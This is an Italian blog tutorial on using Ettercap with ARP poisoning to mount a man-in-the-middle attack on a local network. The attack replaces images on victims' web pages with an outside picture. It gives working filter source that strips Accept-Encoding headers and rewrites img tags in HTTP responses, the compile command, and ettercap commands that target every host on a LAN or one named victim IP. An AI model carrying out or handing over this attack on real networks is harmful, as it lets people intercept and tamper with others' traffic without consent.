06/01/2015, 14:15

ettercap tutorial italiano, ettercap filter, filtri ettercap, tutorial kali linux italiano, kali ettercap italiano



[Tutorial]-Filtri-Ettercap---Sostituire-le-immagini-di-un-sito-web---Kali-Linux


 Divertimento con filtri Ettercap         Ettercap è una sorta di coltellino svizzero per l’ARP poisoning e sniffing di rete. Ettercap può essere esteso utilizzando filtri e plug-in, rendendolo in grad



Divertimento con filtri Ettercap


         Ettercap è una sorta di coltellino svizzero per l’ARP poisoning
 e sniffing di rete. Ettercap può essere esteso utilizzando filtri e plug-in, rendendolo in grado di fare ogni sorta di attività sulla rete. L’utilizzo di filtri è quello che ho intenzione di dimostrare in questo tutorial.

Sì, questo tutorial è un po’ banale, ma è possibile utilizzare le competenze acquisite da esso per fare molte altre operazioni utili. 
La prima cosa che dobbiamo fare è creare un filtro Ettercap. Di seguito è riportato il codice sorgente per il mio:

Il codice sorgente per ig.filter

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.willy-style.com/tette.jpg\" ");
   replace("IMG SRC=", "img src=\"http://www.willy-style.com/tette.jpg\" ");
   msg("Filtro lanciato.\n");
}

         Il codice dovrebbe essere piuttosto auto esplicativo a chiunque che ha un infarinatura di programmazione (è molto simile a C e ad altri linguaggi).
La funzione "replace" sostituisce la prima stringa parametro con il secondo. A causa del modo in cui questa sostituzione stringa funziona cercherà il tag immagine e inserirà l’immagine che desideriamo nel codice HTML della pagina web prima di restituirlo alla vittima. I tag possono finire per diventare qualcosa di simile al seguente:

                 <img src = "http://www.willy-style.com/tette.jpg" /images/original-image.jpg>

         L’immagine originale sarà ancora nel tag, ma la maggior parte dei browser dovrebbero vederla come parametro inutile. La funzione "msg" stampa solo alla schermata facendoci sapere che il filtro è partito.

         Prendete il codice sorgente ig.filter di cui sopra e incollatelo in un file di testo, quindi compilate il filtro in un file .ef utilizzando il seguente comando:

             etterfilter ig.filter -o ig.ef
 
         Se volessimo indirizzare tutti gli host della rete ci sarebbe utilizzare il seguente comando:

             ettercap -T -q -F ig.ef -M ARP // //

         Fate attenzione con il comando precedente, avendo tutto il traffico di una grande rete che passa per un computer lento può davvero impantanarsi la rete. Se avessimo una vittima specifica in mente, diciamo un host con l’IP 192.168.22.47, dovremmo utilizzare questo comando:

             ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

         Ecco quello che i flag di opzione riga di comando fanno:

-T Dice ad Ettercap di utilizzare l’interfaccia testuale, mi piace questa opzione il meglio dei più modalità GUI sono piuttosto confuse.
-q Dice ad Ettercap di essere più tranquillo, in altre parole meno prolisso.
-F Dice ad Ettercap utilizzare un filtro, in questo caso ig.ef che abbiamo compilato in precedenza.
-M Dice ad Ettercap di eseguire il MITM (Man in the Middle) per l’ARP poisoning.

Tenete a mente che questo filtro non sembra funzionare per tutte le immagini, in quanto alcune immagini che vediamo sono gestite con i CSS. 

Per questo tutorial è tutto, a presto! :)



1
Create a website